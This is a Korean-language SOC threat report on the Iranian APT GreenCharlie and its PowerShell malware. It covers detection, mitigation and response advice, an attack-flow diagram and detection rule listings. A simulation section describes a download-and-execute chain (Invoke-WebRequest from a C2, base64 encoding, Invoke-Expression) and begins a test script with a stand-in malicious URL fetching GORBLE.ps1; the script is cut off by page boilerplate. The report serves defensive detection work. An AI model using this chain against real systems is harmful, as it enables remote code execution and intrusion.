GreenCharlie: 이란 지원 APT에 의한 PowerShell 익스플로잇에 대한 SOC 보고서

Ruslan Mikhalov Chief of Threat Research at SOC Prime

GreenCharlie: 이란 지원 APT에 의한 PowerShell 익스플로잇에 대한 SOC 보고서

Detection stack

AIDR
Alert
ETL
Query

위협 보고서
공격 흐름
탐지
시뮬레이션

GreenCharlie PowerShell 취약점 요약

GreenCharlie는 다단계 PowerShell 악성코드 계열(GORBLE, TAMECAT, POWERSTAR)을 사용하여 사이버 첩보 활동을 수행하는 이란 기반의 APT 그룹입니다. 이 그룹은 피싱을 위해 여러 동적 DNS 도메인을 등록하고, 사용자 정의 Base64 및 비트 연산 인코딩을 사용하는 난독화된 PowerShell 스크립트를 사용하며, HTTPS POST를 통해 C2 서버와 통신합니다. 활동은 2024년 5월부터 8월 사이에 이란 IP와 VPN 서비스를 통한 트래픽 마스킹으로 급증했습니다.

조사

그룹과 연관된 알려진 DDNS 도메인 및 IP 범위(e.g., *.ddnsgeek.com, *.dns-dynamic.net)에 대한 네트워크 트래픽을 분석하세요. Base64 디코딩 후 비트 연산 NOT 연산을 수행하고, ScriptBlock.Create 또는 Invoke-Expression을 호출하는 PowerShell 실행 체인과 스크립트를 찾아보세요. 프로세스 주입 및 디코딩된 페이로드의 메모리 내 실행을 모니터링하세요. ATT&CK 기법 T1583.001, T1566.002, T1059.001, T1568과 경계를 연결하세요.

완화

엄격한 PowerShell 로깅(ModuleLogging, ScriptBlockLogging)을 구현하고 제한된 언어 모드를 적용하세요. 알려진 DDNS 제공자 및 의심스러운 TLD(.info, .xyz, .icu, .network, .online, .site)에 대한 트래픽을 차단하거나 프록시하세요. 피싱 도메인에 대해 DNS 샌드박싱 및 URL 필터링을 배포하세요. 난독화된 PowerShell 스크립트 및 메모리 내 AES 디코딩을 탐지하기 위해 엔드포인트 탐지 및 대응(EDR) 솔루션을 사용하세요. 서비스 계정에 대한 최소 권한을 적용하고 불필요한 원격 실행 도구를 비활성화하세요.

GreenCharlie 위협에 대한 대응

지표가 감지되면, 영향을 받은 호스트를 격리하고, 휘발성 메모리를 캡처하며, PowerShell 로그를 수집하세요. 포렌식 분석을 수행하여 디코딩된 페이로드를 추출하고 C2 서버를 식별하세요. 손상된 자격 증명을 취소하고 비밀을 교체하며 관련된 예약 작업 또는 영구 메커니즘을 제거하세요. ICS(domain, IP, 해시 값) IOCs의 위협 인텔리전스를 공유하고 탐지 규칙을 업데이트하세요.

graph TB %% 클래스 정의 classDef technique fill:#ffcc99 classDef action fill:#99ccff classDef process fill:#ccffcc classDef data fill:#f0e68c %% 노드 start[“시작: 초기 실행 트리거”] class start action tech_execution[“기법 – T1059.001 PowerShell: 페이로드를 다운로드하기 위한 스크립트 실행”] class tech_execution technique process_download[“프로세스: 2단계 페이로드 다운로드”] class process_download process tech_obf1[“기법 – T1027.008 스트립된 페이로드 (Base64 + NOT)”] class tech_obf1 technique tech_obf2[“기법 – T1027.014 폴리모픽 코드 (변형 인코딩)”] class tech_obf2 technique tech_decode[“기법 – T1140 페이로드 디코드/역난독화”] class tech_decode technique tech_dns[“기법 – T1071.004 DNS 애플리케이션 계층 프로토콜”] class tech_dns technique tech_dga[“기법 – T1568.002 도메인 생성 알고리즘”] class tech_dga technique tech_web[“기법 – T1102.002 HTTPS 양방향 웹 서비스”] class tech_web technique tech_encrypt[“기법 – T1573 AES 암호화 채널”] class tech_encrypt technique data_exfil[“데이터: 시스템 정보 (OS, 컴퓨터 이름)”] class data_exfil data tech_exfil[“기법 – T1041 C2 채널을 통한 데이터 유출”] class tech_exfil technique %% 연결 start –>|트리거| tech_execution tech_execution –>|다운로드| process_download process_download –>|난독화 적용| tech_obf1 process_download –>|적용| tech_obf2 process_download –>|디코드됨| tech_decode tech_decode –>|통신 경로| tech_dns tech_dns –>|사용| tech_dga tech_dns –>|통신 경로| tech_web tech_web –>|트래픽 암호화| tech_encrypt tech_encrypt –>|전송| data_exfil data_exfil –>|전송 경로| tech_exfil

공격 흐름

GreenCharlie PowerShell 탐지 규칙

GreenCharlie APT PowerShell 악성코드 프레임워크 탐지 [Windows Powershell]

SOC Prime AI 규칙

2025년 11월 12일

보기

외부 서비스/도구를 통한 데이터 침입/유출/C2 가능 (프록시 이용)

SOC Prime 팀

2022년 6월 29일

보기

탐지 대상 IOC(아이피): GreenCharlie APT: 이란의 PowerShell 기반 사이버 첩보 캠페인

SOC Prime AI 규칙

2025년 11월 12일

보기

탐지 대상 IOC(이메일): GreenCharlie APT: 이란의 PowerShell 기반 사이버 첩보 캠페인

SOC Prime AI 규칙

2025년 11월 12일

보기

페이로드 시뮬레이션 지침

공격 내러티브 및 명령어:
단계 1 – 악성 로더 가져오기:
공격자는 Invoke-WebRequest 를 사용하여 GORBLE.ps1 라는 이름의 PowerShell 스크립트를 C2 서버에서 다운로드합니다.단계 2 – 페이로드 인코딩:
다운로드된 스크립트에 악성 페이로드가 포함되어 있습니다. 공격자는 전체 스크립트를 base64로 인코딩하고 변수에 저장합니다.$x.단계 3 – 고위험 cmdlet을 통한 실행:
공격자는 Invoke-Expression을 사용하여 페이로드를 즉석에서 디코딩하여 실행하고, GORBLE 프레임워크를 호출합니다.$x on‑the‑fly and runs it, thereby invoking the GORBLE framework.단계 4 – 수평 이동(선택 사항):
페이로드는 나중에 비트 연산 NOT으로 난독화된 문자열과 함께 ScriptBlock.Create를 호출하여 원격 호스트에서 2단계 PowerShell 명령어를 실행할 수 있습니다.

회귀 테스트 스크립트:

# -------------------------------------------------
# GreenCharlie APT PowerShell 프레임워크 시뮬레이션
# -------------------------------------------------

# 1. 악성 프레임워크 다운로드 시뮬레이션(키워드 GORBLE)
$maliciousUrl = "http://malicious.example.com/GORBLE.ps1"
$downloaded = @"
# GORBLE - 시뮬레이션된 악성 페이로드

SOC Prime의 Detection as Code 플랫폼에 가입하세요 귀하의 비즈니스와 가장 관련 있는 위협에 대한 가시성을 향상시키세요. 시작하고 즉각적인 가치를 창출하기 위해 지금 SOC Prime 전문가와의 미팅을 예약하세요.

무료 가입하기

Name	Descripiton
PHPSESSID	Preserves user session state across page requests. Cookie generated by applications based on the PHP language. This is a general purpose identifier used to maintain user session variables. It is normally a random generated number, how it is used can be specific to the site, but a good example is maintaining a logged-in status for a user between pages.
sp_i	Used to store information about authenticated User.
sp_r	Used to store information about authenticated User.
sp_a	Used to store information about authenticated User.

Name	Descripiton
tuuid	Collects anonymous data related to the user's visits to the website, such as the number of visits, average time spent on the website and what pages have been loaded.
tuuid_last_update	Collects anonymous data related to the user's visits to the website, such as the number of visits, average time spent on the website and what pages have been loaded.
um	Collects anonymous data related to the user's visits to the website, such as the number of visits, average time spent on the website and what pages have been loaded.
umeh	Collects anonymous data related to the user's visits to the website, such as the number of visits, average time spent on the website and what pages have been loaded.
na_sc_x	Used by the social sharing platform AddThis to keep a record of parts of the site that has been visited in order to recommend other parts of the site.
APID	Collects anonymous data related to the user's visits to the website.
IDSYNC	Collects anonymous data related to the user's visits to the website.
_cc_aud	Collects anonymous statistical data related to the user's website visits, such as the number of visits, average time spent on the website and what pages have been loaded. The purpose is to segment the website's users according to factors such as demographics and geographical location, in order to enable media and marketing agencies to structure and understand their target groups to enable customised online advertising.
_cc_cc	Collects anonymous statistical data related to the user's website visits, such as the number of visits, average time spent on the website and what pages have been loaded. The purpose is to segment the website's users according to factors such as demographics and geographical location, in order to enable media and marketing agencies to structure and understand their target groups to enable customised online advertising.
_cc_dc	Collects anonymous statistical data related to the user's website visits, such as the number of visits, average time spent on the website and what pages have been loaded. The purpose is to segment the website's users according to factors such as demographics and geographical location, in order to enable media and marketing agencies to structure and understand their target groups to enable customised online advertising.
_cc_id	Collects anonymous statistical data related to the user's website visits, such as the number of visits, average time spent on the website and what pages have been loaded. The purpose is to segment the website's users according to factors such as demographics and geographical location, in order to enable media and marketing agencies to structure and understand their target groups to enable customised online advertising.
dpm	Via a unique ID that is used for semantic content analysis, the user's navigation on the website is registered and linked to offline data from surveys and similar registrations to display targeted ads.
acs	Collects anonymous data related to the user's visits to the website, such as the number of visits, average time spent on the website and what pages have been loaded, with the purpose of displaying targeted ads.
clid	Collects anonymous data related to the user's visits to the website, such as the number of visits, average time spent on the website and what pages have been loaded, with the purpose of displaying targeted ads.
KRTBCOOKIE_#	Registers a unique ID that identifies the user's device during return visits across websites that use the same ad network. The ID is used to allow targeted ads.
PUBMDCID	Registers a unique ID that identifies the user's device during return visits across websites that use the same ad network. The ID is used to allow targeted ads.
PugT	Registers a unique ID that identifies the user's device during return visits across websites that use the same ad network. The ID is used to allow targeted ads.
ssi	Registers a unique ID that identifies a returning user's device. The ID is used for targeted ads.
_tmid	Registers a unique ID that identifies the user's device upon return visits. The ID is used to target ads in video clips.
wam-sync	Used by the advertising platform Weborama to determine the visitor's interests based on pages visits, content clicked and other actions on the website.
wui	Used by the advertising platform Weborama to determine the visitor's interests based on pages visits, content clicked and other actions on the website.
AFFICHE_W	Used by the advertising platform Weborama to determine the visitor's interests based on pages visits, content clicked and other actions on the website.
B	Collects anonymous data related to the user's website visits, such as the number of visits, average time spent on the website and what pages have been loaded. The registered data is used to categorise the users' interest and demographical profiles with the purpose of customising the website content depending on the visitor.
1P_JAR	These cookies are used to gather website statistics, and track conversion rates.
APISID	Google set a number of cookies on any page that includes a Google reCAPTCHA. While we have no control over the cookies set by Google, they appear to include a mixture of pieces of information to measure the number and behaviour of Google reCAPTCHA users.
HSID	Google set a number of cookies on any page that includes a Google reCAPTCHA. While we have no control over the cookies set by Google, they appear to include a mixture of pieces of information to measure the number and behaviour of Google reCAPTCHA users.
NID	Google set a number of cookies on any page that includes a Google reCAPTCHA. While we have no control over the cookies set by Google, they appear to include a mixture of pieces of information to measure the number and behaviour of Google reCAPTCHA users.
SAPISID	Google set a number of cookies on any page that includes a Google reCAPTCHA. While we have no control over the cookies set by Google, they appear to include a mixture of pieces of information to measure the number and behaviour of Google reCAPTCHA users.
SID	Google set a number of cookies on any page that includes a Google reCAPTCHA. While we have no control over the cookies set by Google, they appear to include a mixture of pieces of information to measure the number and behaviour of Google reCAPTCHA users.
SIDCC	Security cookie to protect users data from unauthorised access.
SSID	Google set a number of cookies on any page that includes a Google reCAPTCHA. While we have no control over the cookies set by Google, they appear to include a mixture of pieces of information to measure the number and behaviour of Google reCAPTCHA users.
__utmx	This cookie is associated with Google Website Optimizer, a tool designed to help site owners improve their wbesites. It is used to distinguish between two varaitions a webpage that might be shown to a visitor as part of an A/B split test. This helps site owners to detemine which version of a page performs better, and therefore helps to improve the website.
__utmxx	This cookie is associated with Google Website Optimizer, a tool designed to help site owners improve their wbesites. It is used to distinguish between two varaitions a webpage that might be shown to a visitor as part of an A/B split test. This helps site owners to detemine which version of a page performs better, and therefore helps to improve the website.

Name	Descripiton
_hjid	Hotjar cookie. This cookie is set when the customer first lands on a page with the Hotjar script. It is used to persist the random user ID, unique to that site on the browser. This ensures that behavior in subsequent visits to the same site will be attributed to the same user ID.
_hjIncludedInSample	This cookie is associated with web analytics functionality and services from Hot Jar, a Malta based company. It uniquely identifies a visitor during a single browser session and indicates they are included in an audience sample.
intercom-id-[xxx]	This cookie is used by Intercom as a session so that users can continue a chat as they move through the site.
intercom-session-[xxx]	Used to keeping track of sessions and remember logins and conversations.
demdex	Via a unique ID that is used for semantic content analysis, the user's navigation on the website is registered and linked to offline data from surveys and similar registrations to display targeted ads.
CookieConsent	Stores the user's cookie consent state for the current domain.
__cfduid	Used by the content network, Cloudflare, to identify trusted web traffic.
ss	These cookies enable the website to provide enhanced functionality and personalisation . They may be set by us or by third party providers whose services we have added to our pages. These services may include the Live Chat facility, Contact Us form(s), the Product Quotation forms and submission process, and the Email Newsletter sign up functionality .

Name	Descripiton
_ga	This cookie name is asssociated with Google Universal Analytics - which is a significant update to Google's more commonly used analytics service. This cookie is used to distinguish unique users by assigning a randomly generated number as a client identifier. It is included in each page. Registers a unique ID that is used to generate statistical data on how the visitor uses the website. request in a site and used to calculate visitor, session and campaign data for the sites analytics reports. By default it is set to expire after 2 years, although this is customisable by website owners.
_gat	Used by Google Analytics to throttle request rate. This cookie name is associated with Google Universal Analytics, according to documentation it is used to throttle the request rate - limiting the collection of data on high traffic sites. It expires after 10 minutes.
_gid	This cookie name is asssociated with Google Universal Analytics. This appears to be a new cookie and as of Spring 2017 no information is available from Google. It appears to store and update a unique value for each page visited. Registers a unique ID that is used to generate statistical data on how the visitor uses the website.
IDE	Used by Google DoubleClick to register and report the website user's actions after viewing or clicking one of the advertiser's ads with the purpose of measuring the efficacy of an ad and to present targeted ads to the user.
r/collect	Used by Google DoubleClick to register and report the website user's actions after viewing or clicking one of the advertiser's ads with the purpose of measuring the efficacy of an ad and to present targeted ads to the user.
test_cookie	Used to check if the user's browser supports cookies.
collect	Used to send data to Google Analytics about the visitor's device and behaviour. Tracks the visitor across devices and marketing channels.
ads/user-lists/#	These cookies may be set through our site by our advertising partners. They may be used by those companies to build a profile of your interests and show you relevant adverts on other sites.
c	Registers anonymised user data, such as IP address, geographical location, visited websites, and what ads the user has clicked, with the purpose of optimising ad display based on the user's movement on websites that use the same ad network.
khaos	Registers anonymised user data, such as IP address, geographical location, visited websites, and what ads the user has clicked, with the purpose of optimising ad display based on the user's movement on websites that use the same ad network.
put_#	Registers anonymised user data, such as IP address, geographical location, visited websites, and what ads the user has clicked, with the purpose of optimising ad display based on the user's movement on websites that use the same ad network.
rpb	Registers anonymised user data, such as IP address, geographical location, visited websites, and what ads the user has clicked, with the purpose of optimising ad display based on the user's movement on websites that use the same ad network.
rpx	Registers anonymised user data, such as IP address, geographical location, visited websites, and what ads the user has clicked, with the purpose of optimising ad display based on the user's movement on websites that use the same ad network.
tap.php	Registers anonymised user data, such as IP address, geographical location, visited websites, and what ads the user has clicked, with the purpose of optimising ad display based on the user's movement on websites that use the same ad network.